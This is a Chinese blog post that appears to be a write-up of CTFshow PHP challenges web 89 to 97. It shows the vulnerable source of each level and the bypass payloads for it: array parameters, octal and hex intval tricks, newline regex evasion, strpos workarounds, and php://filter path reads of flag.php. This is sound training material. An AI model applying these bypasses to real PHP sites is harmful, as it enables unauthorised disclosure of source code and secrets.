<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>CTFshow php特性 | 惜缘怀古的博客</title><meta name="keywords" content="惜缘怀古，博客"><meta name="author" content="惜缘怀古"><meta name="copyright" content="惜缘怀古"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="web 8912345678910111213141516&lt;?phpinclude(&quot;flag.php&quot;);highlight_file(__FILE__);if(isset($_GET[&amp;#x27;num&amp;#x27;]))&amp;#123;    $num &#x3D; $_GET[&amp;#x27;num&amp;#x27;];    if(preg_match(&quot;&#x2F;[0-9]&#x2F;&amp;quo">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow php特性">
<meta property="og:url" content="https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/index.html">
<meta property="og:site_name" content="惜缘怀古的博客">
<meta property="og:description" content="web 8912345678910111213141516&lt;?phpinclude(&quot;flag.php&quot;);highlight_file(__FILE__);if(isset($_GET[&amp;#x27;num&amp;#x27;]))&amp;#123;    $num &#x3D; $_GET[&amp;#x27;num&amp;#x27;];    if(preg_match(&quot;&#x2F;[0-9]&#x2F;&amp;quo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg">
<meta property="article:published_time" content="2022-08-07T09:55:55.000Z">
<meta property="article:modified_time" content="2022-09-15T10:12:58.218Z">
<meta property="article:author" content="惜缘怀古">
<meta property="article:tag" content="惜缘怀古，博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  // Optional features not configured on this site (search, translation, outdated-post notice).
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  // Code-block options: plugin name, copy button, language label, no height limit.
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  // Toast texts for the copy-to-clipboard button (zh-CN: "copied", "copy error", "browser not supported").
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  // Relative ("x minutes ago") dates are disabled on both the homepage and posts.
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  // Suffixes used when relative dates are rendered (zh-CN: just now / minutes / hours / days / months ago).
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  // Third-party assets fetched on demand from a public CDN.
  // NOTE(review): `jquery@latest` is a floating version tag, so the code served can change
  // without any change on this site and cannot be pinned with Subresource Integrity;
  // an exact version (plus SRI where the loader supports it) would be the safer choice.
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'CTFshow php特性',
  // Page-type flags for this page; the inline head script reads isHome (see detectApple).
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  // Last-modified timestamp shown in the post meta line (local time).
  postUpdate: '2022-09-15 18:12:58'
}</script><noscript><style type="text/css">
  /* Fallback rules that apply only when JavaScript is disabled (this sheet
     sits inside <noscript>): presumably the theme script normally reveals
     these elements itself, so here they are made visible outright. */
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  /* Dates in the post list and post meta are hidden by default; show them. */
  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
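    // Small localStorage wrapper with per-key expiry, exposed on window.
    win.saveToLocal = {
      // Persist `value` under `key` together with an expiry timestamp `ttl`
      // days from now. A ttl of 0 means "do not persist at all".
      // Storage failures (storage disabled, quota exceeded) are swallowed:
      // the cached value is a convenience and the page works without it.
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const expiryMs = ttl * 86400000
        const item = {
          value: value,
          expiry: Date.now() + expiryMs,
        }
        try {
          localStorage.setItem(key, JSON.stringify(item))
        } catch (e) {
          // best-effort cache; nothing to do if storage is unavailable
        }
      },

      // Return the value stored under `key`, or undefined when the key is
      // absent, expired, or holds something that is not the JSON object
      // written by set() (a corrupted entry is removed so it cannot throw
      // on every later read and abort the rest of this inline script).
      get: function getWithExpiry(key) {
        let itemStr
        try {
          itemStr = localStorage.getItem(key)
        } catch (e) {
          return undefined
        }
        if (!itemStr) {
          return undefined
        }
        let item = null
        try {
          item = JSON.parse(itemStr)
        } catch (e) {
          // fall through: treated like a missing entry below
        }
        if (item === null || typeof item !== 'object') {
          localStorage.removeItem(key)
          return undefined
        }
        if (Date.now() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }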
  
    // Inject a <script src=url> into <head>; the promise resolves once the
    // element reports it has loaded and rejects on a load error.
    win.getScript = url => new Promise((resolve, reject) => {
      const tag = document.createElement('script')
      tag.src = url
      tag.async = true
      tag.onerror = reject
      const handleLoaded = () => {
        // readyState only exists in older browsers; skip intermediate states there.
        const state = tag.readyState
        if (state && state !== 'loaded' && state !== 'complete') return
        tag.onload = tag.onreadystatechange = null
        resolve()
      }
      tag.onload = handleLoaded
      tag.onreadystatechange = handleLoaded
      document.head.appendChild(tag)
    })
  
      // Switch the document to the dark theme and update the browser chrome colour.
      win.activateDarkMode = function () {
        const root = document.documentElement
        root.setAttribute('data-theme', 'dark')
        const themeColorMeta = document.querySelector('meta[name="theme-color"]')
        if (themeColorMeta) themeColorMeta.setAttribute('content', '#0d0d0d')
      }
      // Switch the document to the light theme and update the browser chrome colour.
      win.activateLightMode = function () {
        const root = document.documentElement
        root.setAttribute('data-theme', 'light')
        const themeColorMeta = document.querySelector('meta[name="theme-color"]')
        if (themeColorMeta) themeColorMeta.setAttribute('content', '#ffffff')
      }
      // Restore the theme and sidebar state saved on earlier visits; this runs
      // in <head>, before the body is parsed.
      const storedTheme = saveToLocal.get('theme')
      if (storedTheme === 'dark') activateDarkMode()
      else if (storedTheme === 'light') activateLightMode()

      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        // toggle(name, force): force=true adds the class, false removes it
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
    // On the homepage only, tag the document with an `apple` class when the
    // user agent looks like an Apple device.
    const detectApple = () => {
      if (!GLOBAL_CONFIG_SITE.isHome) return
      const isAppleUA = /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)
      if (isAppleUA) document.documentElement.classList.add('apple')
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/2.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">66</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><hr/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">惜缘怀古的博客</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">CTFshow php特性</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-08-07T09:55:55.000Z" title="发表于 2022-08-07 17:55:55">2022-08-07</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-09-15T10:12:58.218Z" title="更新于 2022-09-15 18:12:58">2022-09-15</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">9.6k</span><span class="post-meta-separator">|</span><i class="far 
fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>45分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="CTFshow php特性"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="web-89"><a href="#web-89" class="headerlink" title="web 89"></a>web 89</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[0-9]/&quot;</span>, <span 
class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-intval-function.html">intval函数(获取变量的整数型)</a>：如果它的参数是一个数组，只要数组非空，不论元素个数，返回值都为 1；空数组则返回 0</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-preg_match.html">preg_match() 函数</a></p>
<p>利用数组绕过正则匹配：preg_match() 的参数为数组时会报错并返回 false，不会进入 die()，而 intval() 对非空数组返回 1</p>
<p><code>payload：?num[]=1</code></p>
<h1 id="web-90"><a href="#web-90" class="headerlink" title="web 90"></a>web 90</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>===<span class="string">&quot;4476&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span 
class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>intval($num,0)：</p>
<p>如果 base 是 0，通过检测 var 的格式来决定使用的进制：</p>
<pre><code>如果字符串包括了 “0x” (或 “0X”) 的前缀，使用 16 进制 (hex)；否则，
如果字符串以 “0” 开始，使用 8 进制(octal)；否则，
将使用 10 进制 (decimal)。
</code></pre>
<p><code>payload：?num=010574 </code>这里我以0开始，意思就是后面的数字将被以8进制的形式读取</p>
<h1 id="web-91"><a href="#web-91" class="headerlink" title="web 91"></a>web 91</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^php$/im&#x27;</span>, <span class="variable">$a</span>))&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^php$/i&#x27;</span>, <span class="variable">$a</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;hacker&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;nonononono&#x27;</span>;</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br></pre></td></tr></table></figure>

<p>考察点：正则表达式修饰符<br> 拓展</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">i </span><br><span class="line">不区分(ignore)大小写</span><br><span class="line"></span><br><span class="line">m</span><br><span class="line">多(more)行匹配</span><br><span class="line">若存在换行\n并且有开始^或结束$符的情况下，</span><br><span class="line">将以换行为分隔符，逐行进行匹配</span><br><span class="line">$str = &quot;abc\nabc&quot;;</span><br><span class="line">$preg = &quot;/^abc$/m&quot;;</span><br><span class="line">preg_match($preg, $str,$matchs);</span><br><span class="line">这样其实是符合正则表达式的，因为匹配的时候 先是匹配换行符前面的，接着匹配换行符后面的，两个都是abc所以可以通过正则表达式。</span><br><span class="line"></span><br><span class="line">s</span><br><span class="line">特殊字符圆点 . 中包含换行符</span><br><span class="line">默认的圆点 . 
是匹配除换行符 \n 之外的任何单字符，加上s之后, .包含换行符</span><br><span class="line">$str = &quot;abggab\nacbs&quot;;</span><br><span class="line">$preg = &quot;/b./s&quot;;</span><br><span class="line">preg_match_all($preg, $str,$matchs);</span><br><span class="line">这样匹配到的有三个 bg b\n bs</span><br><span class="line"></span><br><span class="line">A</span><br><span class="line">强制从目标字符串开头匹配;</span><br><span class="line"></span><br><span class="line">D</span><br><span class="line">如果使用$限制结尾字符,则不允许结尾有换行; </span><br><span class="line"></span><br><span class="line">e</span><br><span class="line">配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>满足第一个匹配（m 修饰符下 ^ 和 $ 可以匹配换行后的单独一行）：?cmd=%0aphp，同时不满足第二个匹配（没有 m 修饰符时 ^php$ 只匹配整个字符串 “php”）</p>
<h1 id="web-92"><a href="#web-92" class="headerlink" title="web 92"></a>web 92</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span class="line">    
&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>payload：</p>
<p><code>?num=0x117c</code></p>
<p>这里我采用的是16进制绕过</p>
<h1 id="web93"><a href="#web93" class="headerlink" title="web93"></a>web93</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]/i&quot;</span>, <span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)==<span 
class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里直接用八进制绕过：?num=010574（以 0 开头会按八进制解析，结果为 4476，且不含字母，能通过 [a-z] 的检查）</p>
<h1 id="web94"><a href="#web94" class="headerlink" title="web94"></a>web94</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>===<span class="string">&quot;4476&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]/i&quot;</span>, <span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!strpos(<span class="variable">$num</span>, 
<span class="string">&quot;0&quot;</span>))&#123; <span class="comment">// 在这个地方需要返回的值不能为0，也就是说0不能在第一位</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.strpos.php">strpos函数详解</a></p>
<p>所以 ?num=4476.0：“0”不在第一位，strpos 返回非 0，且 intval 结果为 4476</p>
<h1 id="web-95"><a href="#web-95" class="headerlink" title="web 95"></a>web 95</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]|\./i&quot;</span>, <span class="variable">$num</span>))&#123;<span class="comment">// 点匹配没了</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!strpos(<span 
class="variable">$num</span>, <span class="string">&quot;0&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用八进制，并在开头加一个加号（URL 解码后为空格）使 “0” 不在第一位以绕过 strpos 的检查：?num=+010574</p>
<h1 id="web-96"><a href="#web-96" class="headerlink" title="web 96"></a>web 96</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]==<span class="string">&#x27;flag.php&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        highlight_file(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./flag.php</span><br><span class="line">/var/www/html/flag.php</span><br><span class="line">php://filter/resource=flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web-97"><a href="#web-97" class="headerlink" title="web 97"></a>web 97</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>])) &#123;</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>] != <span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>])</span><br><span class="line"><span class="keyword">if</span> (md5(<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>]) === md5(<span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>]))</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">&#x27;Wrong.&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>php中hash比较缺陷</p>
<p><a target="_blank" rel="noopener" href="https://crypto.stackexchange.com/questions/1434/are-there-two-known-strings-which-have-the-same-md5-hash-value">md5强碰撞收集</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/EC_Carrot/article/details/109525162">【PHP】MD5比较漏洞 弱比较、强比较、强碰撞</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/c9089fd5b1ba">MD5碰撞的一些例子</a></p>
</blockquote>
